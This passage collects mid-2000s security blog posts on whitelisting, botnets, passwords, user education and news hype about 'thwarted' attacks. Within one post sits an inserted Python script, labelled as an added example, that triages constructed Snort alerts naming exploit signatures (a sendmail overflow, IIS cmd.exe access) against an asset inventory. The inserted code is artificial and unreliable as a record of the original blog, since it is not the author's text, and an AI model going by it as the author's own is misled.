We just want it to work, not overpower our lives with complexity (like the VCR clock), and not be a completely leaky hole. Security holes will always exist, especially in the market leader, but let's get serious about what the future is. So far, that future still has Microsoft at the forefront, even if I think Vista is going to be ugly, complex, large, buggy, and still clinging to the old underlying architecture and assumptions that made Windows 98 and XP bad. But hey, they're moving in the right direction, and once that big ship gets turned the right way and starts plowing along, they'll do some more great things.

In the meantime, I'll stick to older Windows OS and Linux and pine for a Macbook in the near future.

.: you know, global blacklisting is bad

Spamhaus' recent continuing issues help convince me that spam blacklisting on a global or huge scale is just not worth it. Right now there are lots of firms doing a million little workarounds and hacks to offer up services for safe email, secure email, spam-free email, etc. All of these are built on an insecure protocol and are almost all really bad approaches that will work for a few years and for a decent scale, but are not the approach that will last.

Spamhaus was forced to take a company off their blacklist and pay millions of dollars in compensation to a mass-mailing company that won a suit against them (so I read). I've seen the cost, firsthand, to a company that gets wrongfully blacklisted (or rightfully blacklisted), and it is just not pretty.

Instead of the workarounds and hacks, someone needs to make a better protocol or force more use of the secure versions of those protocols. Let's face it, eventually all traffic is going to be encrypted or obfuscated in some fashion, even if it takes 50 years.

Better yet, adopt something new, like instant messaging over P2P or something similar. Email is surprisingly hanging on despite IM and texting and cell phone use. Will it really still be around in 15 years? I'm skeptical...

.: is security possible?

This topic has been buzzing around in my head a while now, and is finally ready to trickle out. But first, I need to set the stage. (This is going to sound more preachy than I intend, and has also become the unfortunate victim of me being interrupted a couple times at work and unable to put all of this down coherently...sigh.)

- You are never 100% secure, nor is there any silver bullet device, application, or methodology to security in this information age.

- Technology keeps moving at a fast pace, faster than it takes for any security team to dig solid trenches and fox holes and fortify the hills.

- And it keeps getting more complex, sometimes piling more complexity on top of insecure technologies. Complexity yields less security.

- Just today I read a couple doom-and-gloom articles by Richard Grimes, one recent and one from a few months ago. He has a point that security is largely lip service until AFTER "the big one."

- Also some talk about more appropriate consulting and pen-testing from Dan Morrill and Wendy.

- Let's face it, with so many different technologies, business needs, solutions (in-house and out-house), people, and problems, no two corporate networks are alike. Not even close.


Based on all of this, I am convinced of a number of things. First, we should all continue to share as much information as possible, and keep working at those communication lines. One thing that I don't think there is enough of, is on-site tours and demonstrations. Case studies are one thing, but get me and some buddies in the industry into each other's NOCs and systems and let's see first hand what is working or not working. I would love to see how a company like Boeing manages and works their campus wireless systems. Yes, it might be a security concern to let me know, but like Schneier would say about crypto algorithms, if disclosure hurts it, it's not secure anyway. Many corps have some excellent processes and setups, but they can never get talked about in meaningful ways that can help the rest of us. This is one reason I would love to become a pen-tester, assessor, or consultant...so I can see these solutions and build upon other people's hard work and loving efforts.

Second, we need to look to securing our own islands first, before we're going to be able to help with the whole world's picture. What works for one island may not necessarily work for another island. We need to be aware of that: not only is there no one device or application that can give 100% security, but there is also no such device or application that is appropriate for all environments (something the sales people don't understand). If we can't handle the microcosm of our own networks, we have no hope of making sense of the macrocosm of the Internet and the world's networks. Your island may be the only place you'll be able to experience a wave of security nirvana...at least for a few moments. Besides, if internally we are unable to quickly show who has access to the data of client XYZ that we are a custodian of, how can we begin to counsel other islands on how they should handle information?

Third, we need to fight the battle of complexity. Technology will move on and keep getting complex, but many attacks and defenses and competencies of security and security professionals remain grounded in simple basics. We need to keep those basics at the forefront of our minds, not make the security process so complex that we all stand up so high on rickety scaffolding as our foundation to climb to the clouds. Yes, it can be complex and full of frills and thrills, but never compromise the basics for those complexities.

Yes, security seems like a losing battle, but that is what makes this field exciting, ever-changing, a challenge, and a solid career. :)

.: analogy thursday: web surfing

I am going to deem today analogy Thursday, as I was looking for some ideas on analogies for how dangerous the Internet is, namely the web. It is just an odd situation that the Internet is inherently bad and malicious and that users need to take care when surfing. Yeah, like many people really truly take care...

What if television surfing were as dangerous as web surfing? This means that as you flip channels into some of those more obscure higher-digit stations, one may just hijack your television box and switch channels around, or just force them to switch much slower or only view their station until you reset the box and start from scratch. Oops!

What if shopping in a mall were as bad as surfing for places to shop online? Outside of some shops we'd have people jumping up in front of you with signs and coupons and good deals in hand, sometimes getting right in your face and flashing their goofy colorful smiles, causing young children to begin crying. In addition, random stores may put things in your pockets that you won't realize melted in the hot sun until you get home and put your hand in there. Oops! They might even put an RFID tag on you while you're not paying attention, and then follow you around through the rest of the mall. And city. And into your home, happily writing down everything you do on the off chance that they will learn how to market better to you. Who knows when you get into those stores!

And those free samples of chicken at the grocery store? Yeah, nothing is free. In fact, those samples contain powerful lingering doses of laxatives that will force you to stay on the pot for an hour each day for a month. But hey, the grocery store offers toilet paper and other remedies for a fee to help deal with that!

What if browsing a library for books to read were like browsing web sites? Every now and then, a book would take it upon itself to grab your arm and not let go, despite the alarms you cause when you walk out of the building and the nasty looks you get. In fact, some books may look like children's books, but inside are pop-up porn cut-outs. Oh, those long-lost joys of pop-up books! Yay!

Now, the one place where an analogy is a lot more appropriate for the web would be roaming around in nature. You never know if you might turn a bend and run into a bear, a rattlesnake, or even swim up on a stingray. You might just get chomped, bit, or speared if you're not constantly careful and aware of the dangers. And the more dangerous a particular area seems, the more likely it is dangerous. Thankfully nature typically provides warnings such as a snake's rattle or colorful markings on dangerous creatures. Likewise, web sites give off warnings too, if you know how to look for them. And would you stick your hand in a strange hole in the ground or a sleazy looking pond without first doing some risk analysis on the odds of a badger or water-borne parasite being present? And let's not even think about ninjas and how they might stealth up on the trail when you least expect it.

The web isn't what it used to be. While it has become prettier (not including MySpace pages, which are the new GeoCities) and more useful and informative, it has certainly become a lot more dangerous, insidious, and complex.

.: productivity gain from 30-inch monitor?

A researcher has argued that it is worthwhile to get a 30-inch Apple monitor ($1999) because it improves worker productivity.

I really think some researchers are just not that thorough. Yes, you can likely get more work done with more desktop real estate, but how does this compare to a dual monitor setup with, say, 2 17-inch or 19-inch monitors, which would cost far less than $1999? I think unless you need contiguous screenspace (such as with Autocad, Photoshop, or maybe movie editing), the dual or even triple monitor approach is much more worthwhile than one huge single screen.

Do we even need dual monitors? Not necessarily. I currently work on just my laptop screen, although I certainly would make full use of dual monitors like at my last job or at home. As a networking and security geek, I could actually make use of 10 monitors if I had them, displaying things like dashboards, traffic sniffing, alerts, remote control sessions, etc. But for your normal workers, one monitor, maybe two, is sufficient for their job. Eventually, I get into the realm of wanting separate systems as opposed to more desktops or monitors.

I will say, if you want to impress pretty much anyone at work, grab a spare system or two, set it up next to you, and have it running pretty graphs, traces, and dashboards nearby. People seem to think that's amazing, even if it is just gibberish. :)

.: user education does not work

From a CNET article,

"I don't believe user education will solve problems with security because security will always be a secondary goal for users," Gorling said. "In order for security to work, it must be embedded in the process. It must be designed so that it does not conflict with the users' primary goal. It can't work if it interferes."

His first sentence is correct. It is true, user education will not solve our problems. If education solved our problems, we would have a different president right now.

Indeed, as I always say, security is a secondary goal, even for developers and network administrators, let alone your average regular user. Functionality is always first, i.e. getting things done. "Getting it done securely," while a way for managers to package in security as just as important to getting it done, is still just a qualifier to "getting it done."

The second sentence is correct as well, we need to embed the process as much as possible. The systems need to be more protected from dumb users or just simple mistakes in judgement. The network needs to be more protected. This is the real key where prevention systems come into play. Detection works wonders, but the assumption that users will make mistakes means you need prevention, mitigation and incident response, and audit trails (detection and logging).

And then his last few sentences are the real problem. We have to do these security things without impacting the user's primary goal of getting things done.

Now, I really believe education will not solve our problems, but it will go a LONG way toward helping. Just because education doesn't solve all our problems is not a valid argument to say we should throw our hands in the air and not do any education. I like the mention in the article about giving users some education while actually attending to a problem. This is highly effective and focused education that can have an impact. Education makes an impact and some people do want to learn and be better about it, but it is true, it won't solve ALL our problems. But the speaker is correct, we shouldn't hold up education as the root solution to our problems.

It is highly important to make sure security does not unduly interfere with employees getting their jobs done. However, this goes both ways. Employees need to be receptive to changes in their job. A security-induced change may not even impact users if they were to just adopt the new way of doing their job. Sometimes this battle between security and usability is just human nature being stubborn and unwilling to change, even if those changes result in less work for the user.

I've slowly become a minor proponent of having less rules and less impact on users. I detest rules and limitations on my computer use at work, which impacts my happiness and thus my productivity. Now, I may be a bit more progressive in my use of the Internet than many people that I work with, but slowly, attitudes will change as more and more people enter the business world that have grown up with a computer in their rooms and their social lives have long incorporated the use of a computer through web pages, blogs, IM use, email, music, and so on.

We still need education, but we also need to make sure we do our professional diligence on the back systems and networks before dictating what users can and cannot do. And I truly believe we need less rules, overall, in our businesses. We just need smarter rules and enhanced incident response. Rules stifle innovation and happiness, and we need both in our businesses.

.: application whitelisting

Read this article on DarkReading.com about whitelisting of applications. I like this point:

But whitelisting has a down side. These endpoint tools come with plenty of administrative overhead as well as security risks. "The institutional overhead in maintaining them is extreme," says Thomas Ptacek, a researcher with Matasano Security. "Some poor group of souls in IT is charged with deciding which applications every sales person or project manager can run, and has to backstop all the ensuing arguments."

What are the pros and cons of application whitelisting, and where do I stand?

PROS
First, when machines are imaged or supported by IT, they should have a list of applications that need to be loaded for new hires or replacement machines.

They should also have a list of applications to expect, that IT may or may not have to provide at least a little bit of support for (yes, we'll help you with Outlook, no we won't help you with Alefox or IE toolbars). Related to support, security persons responsible for keeping up to date on patches need a list of applications they should be checking. IT should not be expected to be knowledgeable on patches for every toolbar app that may be used in the corporate environment.

Additionally, disaster recovery may require knowledge of what is necessary for groups such as sales people to do their jobs.

Much like firewall rules, default deny with a whitelist of allowances is much easier to maintain than a blacklist. You can blacklist categories of applications (P2P, IM, etc), but we already see the lines between those categories continuing to blur.

CONS
Take this scenario. Sales requests a new application on their machine. Those "poor souls" in IT then have to research it and either add it to the whitelist or explain why it should not be allowed. With strong policies and management support of policies, this might be ok, but I believe most companies will put those "poor souls" in the unfortunate position of either saying "yes" to requests or being in a hard place when trying to say, "no." The end result is wasted resources, unnecessary negative feelings towards IT by the sales group, and overall less authority. What if the sales group has already been using the application for 4 months? Those "poor souls" really are poor souls.

(Honestly, those "poor souls" need to be backed heavily by a manager-level person, otherwise anyone smart enough to do proper evaluations and even backstop the ensuing arguments is not going to be in this sort of a position for very long.)

And what if each department is asked to create such a whitelist of programs that are needed? I've seen managers throw back every single program they can think of, whether it is really necessary or not. "All of them." Many managers and business users do not care to be bothered by such things, but will detest IT making the decisions for them.

As long as users run Windows, run as Administrator, and all sorts of things want to get installed or used (some even as benign as a proprietary web player like Flash or similar), trying to maintain a whitelist of programs that are necessary is difficult.

Whitelisting will stifle innovation and the ability to try out new applications and tools.

So, where do I stand in all of this?

I think some whitelisting is necessary, but it cannot end up being heavy-handed unless the company has some serious security requirements, small niches for their computer use, or is a majorly large network where application management is nearly impossible. IT certainly needs to maintain a list for proper imaging and support of workstations.

This goes back to what I said in my previous post: less rules.

Less rules. Smarter rules. Better mitigation, response, tracking. Better perception of organizational IT. Let people, within reason, do as they wish on their workstations in order to have a productive, happy life with the company.

.: google desktop search forensics
This paper about the use of Google Desktop in forensics is concise and informative. The most interesting aspect of this is just how much Google Desktop indexes and makes copies of. Email, local files, network files, and even web surfing histories are stored independent of those applications or the OS. This means that even a laptop that shouldn't have sensitive data on it may still contain copies of open network share files that the user has access to, confidential emails, or even files from other users on the same system. In addition, web surfing history and some artifacts are also retained, even if the user attempts to clear those things in the browser options or with a third-party privacy tool.

The only limitation so far is the inability to just read the files. You have to copy the files to a separate machine, make them Read Only, and then open those files in that machine's Google Desktop Search tool. But still, this can act as a powerful tool to find some artifacts. It can also act as a surprising vector for data leakage in an organization.
.: crimeware and phishes

I think one barometer of how IT and security are moving more in tune with the business world instead of being some back room geek department, is how often I read buzzwords and newly created words.

I just read the Websense H1 2006 Security Trends Report and was amazed at all the new words I found.

We have malware, adware, and spyware. I guess I should have seen crimeware coming. I guess Websense means crimeware is software used to commit a crime? I think I will stick to malware as my term of choice. I have also seen eCrime.

I also gleefully read how a host with multiple phishing sites is termed to be host to numerous phishes. Phishes...does that mean the host can be called a phish tank, or perhaps a pond? And would abandoned sites be phishheads? The report also referenced spear phishing, which is a more targeted phishing attack. Honestly, I think almost all phishing attacks are a bit targeted. While that term I have heard before, it still amused me since I started looking for these creative terms.

Screen scraping applies to those malware components that take screenshots of the user's screen, a means to thwart captchas and virtual keypads, kinda like a keylogger for the whole screen itself. Screen scraping just does not sound fun, and reminds me of a window washer or perhaps a visit to the dentist.

Now, while I might poke fun at the report for the terms used, the information presented is excellent and a very good read on the trends that Websense has been experiencing so far this year.

.: blackhat and hitb papers and presentations
All of the HITB2006 papers are online now.

A quick pointer to an archive of Black Hat media presentations. Save the interesting ones, since they do cycle them regularly.

Black Hat 2006 papers and media are available. Scroll down for the video portions. Also, the archives are a good place to be for even more media.

Defcon 14 presentations

Black hat 2006 presentations
.: 10 tips for using vpns
I know this is ComputerWorld, one of the ad-driven free mags that tend to review products and state the obvious, but this quick article on 10 tips to secure VPNs is a pretty good and quick read with some specific technical details as well as common sense items that are sometimes hard to get management levels to listen to (such as only opening the VPN to those who truly need it). I like that some of the points are actually alternatives, such as secured mail or SSL/passworded web sites when, really, the need is smaller than the justification for a full VPN solution. Unfortunately, other items, like jailing users from the rest of the network, are a bit more advanced and complicated.

Of note, this response was given on Infosec News and deserves to be read in conjunction with the original article as the author makes some excellent points.
.: screencast and vnc2swf
Screencapture in Linux can be tricky. Here are two resources to check out.

Wikipedia entry
vnc2swf
.: dd-wrt
DD-WRT is a replacement firmware for some WAPs, including the models I have extras of. Adding to my personal project list.
.: security podcasts

About 6 months ago I started delving into the world of podcasting and began to quickly try and figure out which computer security-related podcasts were worth the trouble to download and check out.

I never did find a groove with my checks and samples. I don't have ipod-support in my car, and really don't find myself just listening to them in the background while I do other things. If my car were more equipped, I may have checked into things more. I also didn't have the habit of listening to them otherwise, or the time to download them and catch up or keep track of all of their release times. I don't use iTunes for my own personal reasons (I would if I had a Mac), and none of the other downloaders were really all that excellent. Doppler was the best, but there was always that one odd podcast that Doppler couldn't track and auto-download, which eroded the whole experience. As such, I just this weekend deleted all the old ones I had downloaded and have shelved the pursuit.

But now I see Chris Brunner did some of the hard work for me of culling out the less useful podcasts, and created a list of them on his own site. I need to update my own geek site links with a few of these new ones that I didn't have, and check into trying to resurrect this pursuit. I'd love to keep up with security through this media as well as print news.

.: the questions we ask

A recent SANS Handler Diary entry reminded me the importance of keeping at hand a list of The Questions that we should ask as IT and security professionals. I need to keep updating this list, as they will all likely be questions I will want to keep at hand throughout my entire career.

- If hard drive X were to die right now, could you confidently rebuild it using backups or other documented knowledge? This applies to any system from the most critical server to the least important spare system to any employee workstations.

- If incident X were to happen right now, what is your response procedure? Apply this to the most benign alert up to a major hacking incident that is right now being executed, successfully. Would you have an available audit trail?

- How do you know your network or systems are secure?

- How do you know that there are no rogue wireless access points giving access to your network (or that your users might be hopping onto nearby)?

- Are network diagrams, documentations, and inventory up to date? Include process documentation.

- If one of your users (CFO to call center ops) is specifically targeted by a 0day emailed exploit, how will they react? Is user education appropriate and is IT held in enough regard to have incidents reported?

- If a complete network audit were to be done now, what might you be surprised to see still in service, accessible, or configured? Yes, even networks need to be flushed and cleaned out and retooled regularly.

I hope to add more.

.: botnets: the next cyberwarfare frontline

eWeek poses the question on whether the botnets have already won. Botnets are not new, but they have been hot news for the past year or so. Unfortunately, while technology likes to move quickly, and vulnerabilities appear and disappear even more quickly, botnets are a fact of life on the wire that is not going to go away any time soon. In fact, I firmly believe we've only just begun to see the power, effects, and changing landscape of the wire that botnets are catalyzing. The article mentioned is an excellent look at the situation.

Defending against botnets is difficult, if not outright impossible right now. Traffic jamming at ISPs or even local networks is useless when the bots tunnel through common ports. Traffic inspection is useless when the bot traffic becomes encrypted or the attacks themselves are real traffic. Shutting down C&C servers is futile now that botnets can work with existing dynamic features on the Internet, can become smaller autonomous units, or just plain efficiently change servers in an instant. Centralized tracking, detection, and disinfection of bots is not cost-effective for anyone because many home users who are infected have no idea they are infected nor have any idea how to fix it without a lot of hand-holding. Besides, it is a common fact that securing every system on the Internet is just not going to happen. Coordinating efforts across nations and continents is not supportable at this time, and even if an effort got underway, laws are still far behind technology. Botnet code can be reverse engineered and attacked directly, but much like signature-based detection, this is thwarted by even as little as a single bit change, let alone polymorphic code. And attempting all of these things is still tough to do in as lucrative and profitable a way as the attackers. The article even mentioned that some significant work is done by volunteers.

To strike up a poor analogy, imagine that cars are able to be controlled remotely (not all that far away considering we can monitor the status of cars now and unlock them from a central system or install navigation systems), and I have a way to control half the cars in your neighborhood. What would happen if I have them all play demolition derby with your house? Imagine that some of them are unmanned, but some are manned with trapped drivers. You can build walls, attack each one with rockets, put mines up all over, build a basement they can't get into, build fake houses so they may or may not get your real one...

So, what about beating botnets? Where are some of the weak points to attack? Well, first of all a botnet might be able to be wielded against a botnet, although to what aim, that is a bit unknown as are the ethical implications. However, it is only a matter of time before a government decides to have its own botnet for cyberdefense and attack reasons. Whereas so many simulations talk about targeted attacks and actual hacker penetrations shutting down systems, something as simple as a coordinated, specific DDoS attack by a botnet can put a stranglehold on critical services. Ask any company that has gone out of business due to a sustained DDoS on their systems.

Botnets, in the end, are still controlled by one or a small number of skilled people. Those people need to be ferreted out and shut down or neutralized or brought to justice. While law enforcement is still largely powerless against foreign-based attackers, I can foresee a time when more secretive agencies or corporate-sponsored groups clash on the cyber battlefield as both attempt to protect their interests. Still, take out the people doing the intelligent coding...

Corporate IT security can move outward to protect employees even at home or on home networks. The real skill in cleaning infections and increasing security at work or at home still lies with IT professionals getting their hands dirty and educating users, even just a little bit. While corporate entities can do a decent job internally, so often we shy away from opening the doors to home support (and mostly rightly so...). It definitely would take a commitment from top management, but does make sense even from an HR perspective.

Better Operating Systems and security products for the home would be a step in the right direction, but will never be more than a variably-sized speedbump for botnets and attackers. Still, some protection is better than none, and a secure or less popular OS is better than putting oneself in the midst of the low-hanging fruit masses.

No matter how this plays out, the botnet war is worth watching. This is still only the beginning and is a major issue that few people want to talk about because of how debilitating it can be and how nearly impossible it can be to defend against or prevent. But this is a topic that will be shaping our security and maybe even our networking as a whole for the next ten years. Mark my words. :)

.: we have deflected a hacker attack!

I am amused and irritated by regular news reports lately that come in one of two flavors.

First, the articles about how information disclosure occurred at an organization and that X amount of people were notified, a hotline set up, and a web site created with answers to common questions that the possible victims may have. While all of this is good and detailed, rarely is there any discussion on two things I most want to know: How did the attack occur, and what assurances are there that the information on the system was all that was exposed? My guess is that these are cloudy questions with even cloudier answers...which troubles me.

Second, articles that state an organization thwarted or repelled a hacker attack. Ok, how do you know there was a hacker attack? Who was it? What did you do to thwart it? Was there even an incident at all? I guess if I wanted to drum up my IT team, I could spread word that when Snort gave an alert about a sendmail.pl exploit attempt against my server (captured in IIS logs) that doesn't even affect anything on my server nor would ever potentially affect it because we don't run sendmail, I can go ahead and raise the flags and drop confetti because my team...hell...*I* saved the day and thwarted a hack attempt!

As a technical individual, I am quickly requiring details, or it didn't happen. Screenshots or it didn't happen!
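The sendmail-alert-against-an-IIS-box situation above is really an alert triage problem: an IDS alert only becomes an incident if the targeted host actually runs the software the signature is about. The following added example (not from the post, and not Snort's own code) parses a few constructed lines in Snort's "fast" alert format, compares each alert against a constructed asset inventory (host -> listening port -> software), and marks alerts "not applicable" when nothing listens on the targeted port or the rule names software the host does not run. The software keyword list and the inventory are assumptions made up for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample alerts in Snort's "fast" alert format (not from the post).
SAMPLE_ALERTS = """\
08/14-10:22:01.123456  [**] [1:2000:3] EXPLOIT sendmail overflow attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 203.0.113.5:4312 -> 192.0.2.10:25
08/14-10:23:44.000001  [**] [1:2001:1] WEB-IIS cmd.exe access [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 203.0.113.5:4313 -> 192.0.2.10:80
08/14-10:25:10.500000  [**] [1:2002:2] WEB-MISC apache chunked encoding [**] [Classification: Web Application Attack] [Priority: 1] {TCP} 198.51.100.7:5100 -> 192.0.2.10:80
08/14-10:26:00.000000  [**] [1:2003:1] SCAN nmap XMAS [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 198.51.100.7:5101 -> 192.0.2.99:22
"""

# Constructed asset inventory: host -> {listening port: software}.
# The web server in the post runs IIS and no mail daemon at all.
INVENTORY = {
    "192.0.2.10": {80: "iis", 443: "iis"},
}

# Assumed: words in rule messages that name a specific software target.
SOFTWARE_KEYWORDS = ("sendmail", "iis", "apache", "exchange")

# Fields of one fast-format alert line; the timestamp prefix is ignored.
ALERT_RE = re.compile(
    r"\[\*\*\] \[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\] (?P<msg>.*?) \[\*\*\] "
    r"\[Classification: (?P<cls>.*?)\] \[Priority: (?P<prio>\d+)\] "
    r"\{(?P<proto>\w+)\} (?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)"
)


@dataclass
class Verdict:
    sid: int
    msg: str
    dst: str
    dport: int
    verdict: str   # "investigate" or "not applicable"
    reason: str


def triage_line(line, inventory):
    """Classify one alert line against the inventory; None if the line does not parse."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    sid, msg = int(m["sid"]), m["msg"]
    dst, dport = m["dst"], int(m["dport"])
    services = inventory.get(dst)

    # Unknown host: the inventory cannot rule anything out, so a human looks.
    if services is None:
        return Verdict(sid, msg, dst, dport, "investigate", "host not in inventory")

    # Nothing listens on the targeted port: the exploit had nothing to hit.
    if dport not in services:
        return Verdict(sid, msg, dst, dport, "not applicable",
                       f"no service listening on port {dport}")

    # The rule names software, and it is not what this host runs on that port.
    running = services[dport]
    for kw in SOFTWARE_KEYWORDS:
        if kw in msg.lower() and kw != running:
            return Verdict(sid, msg, dst, dport, "not applicable",
                           f"rule targets {kw} but host runs {running} on port {dport}")

    return Verdict(sid, msg, dst, dport, "investigate", "target matches inventory")


def triage(alert_text, inventory):
    """Triage every parseable line of a fast-format alert file."""
    verdicts = []
    for line in alert_text.splitlines():
        v = triage_line(line, inventory)
        if v is not None:
            verdicts.append(v)
    return verdicts


def count_by_verdict(verdicts):
    """Summary counts, e.g. {'not applicable': 2, 'investigate': 2}."""
    counts = {}
    for v in verdicts:
        counts[v.verdict] = counts.get(v.verdict, 0) + 1
    return counts


if __name__ == "__main__":
    for v in triage(SAMPLE_ALERTS, INVENTORY):
        print(f"sid {v.sid} -> {v.dst}:{v.dport} [{v.verdict}] {v.reason}  ({v.msg})")
    print(count_by_verdict(triage(SAMPLE_ALERTS, INVENTORY)))
```

Only the two "investigate" alerts deserve a mention to management; the sendmail alert against a host with no port 25 listener is the kind of noise the post is complaining about.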

.: passwords are not great, but they are not broken either

I love articles like this short bit about password security from eWeek because there are simple parts to them that I like and other parts that I really disagree with.

What I agree with: Yes, I truly think biometrics will continue to increase in widespread use, even down to individual systems. But unlike passwords, the simple use of these things can provide false positives or true negatives and will not reduce any dependency on help desks. In fact, help desks might be even more encumbered as fixing biometric logon issues is a bit more complex and dangerous than just resetting someone's password.

Yes, I think single sign-on technologies should be focused on as much as possible, even though they tend to be a luxury for many IT departments as opposed to what just happens. But single sign-on technologies should not be confused with actual authentication technologies. They are separate entities.

And yes, users tend to write down their passwords just like people put spare keys under their car, under the doormat or nearby garden rock or on the back door frame.

What I don't agree with: Passwords written down on paper are better than easy to remember passwords that are not written down, especially passwords that are too simple. While a complex password might be written down on paper next to a desk, an attacker still must have local access (either personally or through an insider) to the physical facility to read the paper. A simple password on a networked system can be guessed or cracked. So I find it dubious to dismiss passwords simply because they can be written down. For technical people who are comfortable with passwords and password safety, they are just fine.

No IT help desk should complain about user password reset requests. That is why that business function is there, and any alternative is going to be more of a headache than verifying the user and resetting the password. This should not be an argument for alternative forms of authentication.

In the end, there is no 100% perfect authentication system, which is why I dislike articles like these which try to dismiss one because it is not 100% perfect, and market others (whether a new idea or just the same old rote from 2 years ago, like this article). Yes, passwords have issues and there are risks associated with any level of their use, but they are easy and are going to continue to be used for many, many years to come for a variety of things (although perhaps the highest security for information and perhaps corporate use may shift as higher order tech lowers in cost).

.: blog comments lost in the wind

I just have to say I think more blogs should email commenters on responses to their comments. Too often I make a comment that I'd love more dialogue about, only to never remember to hit that blog again until more news has buried what I commented about. I don't like fire and forget blog comments...but I frequently forget to check back. I imagine I am not alone.

Then again, perhaps that would get spammy with lots of commenters...and that might be open for abuse as well.

Dang, well, the idea SOUNDED good... Hmph.

.: process and documentation, the art of

The more I work in small-medium companies that act as ASPs (application service provider, i.e. we host servers that our clients use), the more I realize there comes a point where process outweighs getting things done.

Instead of fielding requests as they come in and just getting the work done, change management starts to tickle the back of the throat and more and more, documentation and process need to be invoked. When a request comes in, a process is begun to deal with that request and tie it into any other processes.

For example, an SSL renewal is not just an SSL renewal anymore. Not only does it need to take place on the web server, but the new SSL certificate needs to be imported into our IDS/IPS to decrypt the traffic. While one person doing all of this can keep track of it, eventually as growth continues, multiple people doing these things means they may possibly get lost. Ack! ...And this is one of the simple ones.

What makes all of this even more fun is the propensity for people to want to avoid documentation and process and change management. It slows things down and sometimes brings out some weaknesses in how people document and write and attend to detail. In fact, out of about 25 IT people I have worked with extensively, only about 4 have not heavily resisted these tasks (this includes.

This is kind of a reason I include a line on my resume below my college degree that states I also have a background in "environmental sciences." There is nothing like lab work in genetics, biology, physics, or chemistry to ground oneself in documenting observations and drawing valid conclusions which can be recreated and clearly conveyed to others. Having had an interesting 2.5 years of that work, it does make a difference when troubleshooting networks and documenting process.

.: 10 dangerous things users do online

Mostly posting this here just to save this link for myself. This is a nice list of some of the more dangerous things users do online. This is not everything, but hits many points, in order of descending severity:

- Clicking on email attachments from unknown senders
- Installing unauthorized applications
- Turning off or disabling automated security tools
- Opening HTML or plain-text messages from unknown senders
- Surfing gambling, porn, or other legally-risky Websites
- Giving out passwords, tokens, or smart cards
- Random surfing of unknown, untrusted Websites
- Attaching to an unknown, untrustworthy WiFi network
- Filling out Web scripts, forms, or registration pages
- Participating in chat rooms or social networking sites

Some things I would add: participating in P2P or IM services at work; not evaluating whether the audience of the information they send out via email should be reading it or not; purchasing and installing random devices on their computers (ipod, wireless APs, mobile handhelds...); and the list can go on...

.: windows vista security

Thought for the weekend.

Microsoft wants to fortify its own operating system, Windows Vista. But will it be forced to keep the OS insecure because there is a big market for companies that secure Windows? Imagine the extreme. What if Vista were a highly secure OS? Would these companies curse Microsoft for putting out a good, solid product?

Talk about a bad situation...

.: google placed as the new centralized pc

Just wanted to again mention that Google Reader is amazingly awesome. It has certainly solved my problems with managing news sites, reading news daily, blogs, and rss feeds.

Google is doing something right with their "web 2.0" apps or pseudo-web 2.0 apps depending on whom you ask. I really appreciate the ability to look at my news sites from any system from any net connection. I think as the world becomes more mobile and people begin to have multiple computers (and devices) both personal and even counting their system at work, the freedom and demand to be able to access things remotely is going to increase dramatically. And it is not enough to push VPN technology and remote control solutions (all those RemoteToMyPCAnywhere sites can go to hell, really). In the end, the most-used apps are going to slowly creep towards being web-delivered just like webmail is. I can access Gmail from anywhere and get the same experience as if I were on my personal machine. I can do the same exact things from my Linux and Windows boxes, just by using a web browser.

Google has a good head-start here by identifying the most-used apps on computers, and attempting to replace them with web-driven alternatives. Email, IM, voip, Office, news (RSS), entertainment, and so on.

It is no longer about being able to roam from computer to computer in a corporate environment and have my own profile and settings and apps available. It is about roaming anywhere in the world and still having everything I need.

.: how to improperly support separating ethics and computer security

Ira Winkler from ComputerWorld has a rather controversial article up about the separation of ethics from computer security. This is IT journalism at its most typical: they can write about it, but they don't know it. He does have some points, but otherwise he also has dubious claims.

There are a few things Ira conveniently leaves out or is not even aware of in regards to this subject.

1. The methods to detect, investigate, and enforce ethical behavior on computer systems utilize many of the same functions that computer security uses. This means there is a natural integration of the two. Computer security requires virus scanning and data/file inspection of some sort. Unethical copyright distribution will utilize similar tools and the same staff.

2. There is a tendency to generalize. If someone is visiting bad web sites that are unethical to visit inside the corporate network, there could be security implications. Too often, those same sites house malware and other bad things. This is just a tendency, but that is what computer security is about. It is not just 100% black and white. The twin goals of ethics and security help to fully dictate that those sites are off limits and against policy. In short, why make two policies when they support each other?

3. If there are too many points to make when educating users on computer security and ethics, that is not an argument to separate the two entirely. It just means the education needs to be structured better to accommodate making only one or two points. Perhaps ethics can be split off during the education process, but this is simply not a valid supporting argument. It would be difficult to teach users about email security, password complexity, phishing attacks, and proper data usage in the copy room at one time as well. So does that mean those should not be computer security as well?

4. What does Enron have to do with this discussion other than being an excuse to bring up a popular culture/media example?

5. What does physical security have to do with this argument? Yes, security staffers may be disdained for being those who mete out punishments, but that makes no sense as an argument to separate ethics and computer security. The argument would be to minimize our negative impact on users. Well, by that token, should we separate out incident response, since that tends to be negative? What about when a virus is detected on a machine and we have to go inform the user and slap their wrist for downloading it in their email and saving it? This argument makes no sense.

6. Ira would have been better served by not bringing up phishing attack examples and how those are mechanical in nature but ethical decisions are not as straight-forward. Tell that to the people doing studies on how difficult it can be to detect phishing websites. In fact, I would conjecture that most unethical behavior in a workplace is *easier* to determine than some of the "mechanical" computer security issues, especially for non-technical people.

The best part of the article is how Ira even attacks his own argument and makes no real effort to address it. The ending feels very bipolar like he had an argument, didn't win, but then just moved on.

Now, all that said, there is merit to saying ethics should be separated in part from computer security itself. IT staffers may detect and report on unethical behavior, but ethics is still ultimately up to legal, HR, and corporate executives to determine. But that is not enough to say that ethics and computer security should be fully separate. There is too much at stake for business and security staff to try to fully separate these spheres in anything but a very large company that can have separate ethics staff. Even then, those teams will work closely together anyway.

.: on physical security and computer security

In my previous post, one bullet point was brought up about physical security and computer security and Ira Winkler brought up that physical security is often welcomed while computer security staffers are often not liked. Why is this?

The biggest single reason is simply rooted in culture. At home and outside work, people use computers in their daily lives to do many, many things: looking at maps for driving directions, popular news, entertainment, distractions, looking up information on a topic, meeting new people, reconnecting with old friends, and on and on. Computers are used at home in a variety of ways, many of which are not necessarily safe, ethical, or healthy.

